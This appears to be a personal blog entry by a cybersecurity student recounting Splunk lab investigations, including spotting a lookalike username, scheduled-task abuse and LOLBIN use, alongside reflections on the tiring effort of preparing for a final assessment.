Today was packed with labs: one on Splunk dashboards and reports, one focused on an investigation, and another on logging within Splunk.
I was a bit ahead because I’d already completed the dashboard lab over the weekend, so I jumped straight into the investigation. Of course, it turned into another headache. The first task was to identify a user with a suspicious username, an easy win since the name was nearly identical to another user’s, except for one letter being swapped out with a number (classic hacker move).
Then, things got trickier. I had to find the right field to search for the user who was using Windows Task Scheduler to run malicious tasks. It’s one of those sneaky tricks that attackers love: schedule tasks are often overlooked, making it an ideal method for them to carry out their actions without raising suspicion
Next, I had to dig even deeper to find a user who executed a system process (aka LOLBIN Living Off the Land Binary) which refers to legitimate system binaries that attackers use to execute malicious actions while blending in with normal system activity. For example, a hacker might use powershell.exe or cmd.exe to download or execute malicious code, making it harder to detect because these are normal processes.
It was a bit of a struggle because I still have a lot to learn about operating systems. Today, I finally grasped what a system process actually is. So, I spent a lot of time researching to fill in the gaps in my knowledge. Once I found the malicious file and tracked down the URL that the infected host had connected to, I thought I was done.
But nope, not really. I kept pushing myself with more labs to get as much practice as possible. The more I did, the more I realized I wasn’t yet as comfortable with Splunk as I wanted to be. So, I kept at it. Every investigation was tough and draining but I knew I had to keep going.
I’ve been doing every lab I can find on Splunk. There are a lot of tough investigations, each one making me want to crawl into bed and sleep for days.
In fact, I didn’t sleep too well last night. Splunk was literally on my mind all night long. I kept running investigations in my dreams. But, on the bright side, day by day, I’m getting more comfortable with it. And now all I want is to feel fully prepared for the final assessment.
